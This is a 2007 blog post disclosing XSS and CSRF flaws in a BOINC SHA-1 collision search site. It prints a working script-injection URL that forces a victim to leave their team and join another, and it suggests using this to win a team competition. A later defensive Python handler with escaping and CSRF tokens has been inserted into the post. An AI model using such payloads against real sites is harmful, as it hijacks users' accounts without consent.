Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at elhacker.net, they showed a project for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" between teams to win credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF and an XSS in the team search engine.

So, I made a simple exploit that will change your team to... BOINC Confederation.

The XSS vuln is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all forms.

The exploit (for firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P
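As an added, defender-side example (not from the original post or from the BOINC project), this is what closing both holes looks like in a minimal Python handler: the search page HTML-escapes the reflected team_name, and the quit/join actions require a per-session CSRF token, so a payload like the one above is neither executed nor able to forge the POSTs. The in-memory session store, the csrf field name and the helper names are my assumptions.

```python
import html
import secrets
from urllib.parse import parse_qs

# Constructed in-memory session store (assumption): session id -> {csrf token, team id}
SESSIONS = {}

def new_session() -> str:
    """Create a session with its own unguessable CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf": secrets.token_hex(16), "team": None}
    return sid

def current_team(sid: str):
    return SESSIONS[sid]["team"]

def team_lookup(query_string: str) -> str:
    """Search page: the bug was echoing team_name raw; escaping it neutralises <script>."""
    params = parse_qs(query_string)
    name = params.get("team_name", [""])[0]
    return f"<p>Results for: {html.escape(name, quote=True)}</p>"

def _team_action(sid: str, form_body: str, id_field: str):
    """Shared check for team_quit_action / team_join_action: session + matching CSRF token."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return 403, None
    form = parse_qs(form_body)
    token = form.get("csrf", [""])[0]
    # Constant-time compare; a cross-site POST cannot know this per-session value
    if not secrets.compare_digest(token, sess["csrf"]):
        return 403, None
    value = form.get(id_field, [""])[0]
    if not value.isdigit():
        return 400, None
    return 200, int(value)

def team_quit_action(sid: str, form_body: str) -> int:
    status, _ = _team_action(sid, form_body, "id")
    if status == 200:
        SESSIONS[sid]["team"] = None
    return status

def team_join_action(sid: str, form_body: str) -> int:
    status, team_id = _team_action(sid, form_body, "teamid")
    if status == 200:
        SESSIONS[sid]["team"] = team_id
    return status
```

The token only helps once the reflection is escaped: while the XSS exists, an injected script can read the token from the quit form the same way the payload reads the id.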

So, by "stealing" a user from an important team, you can make your team win. The list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php

Greetz!!

--EDIT--
The bug has been fixed :) It's good to see that someone actually reads my blog xD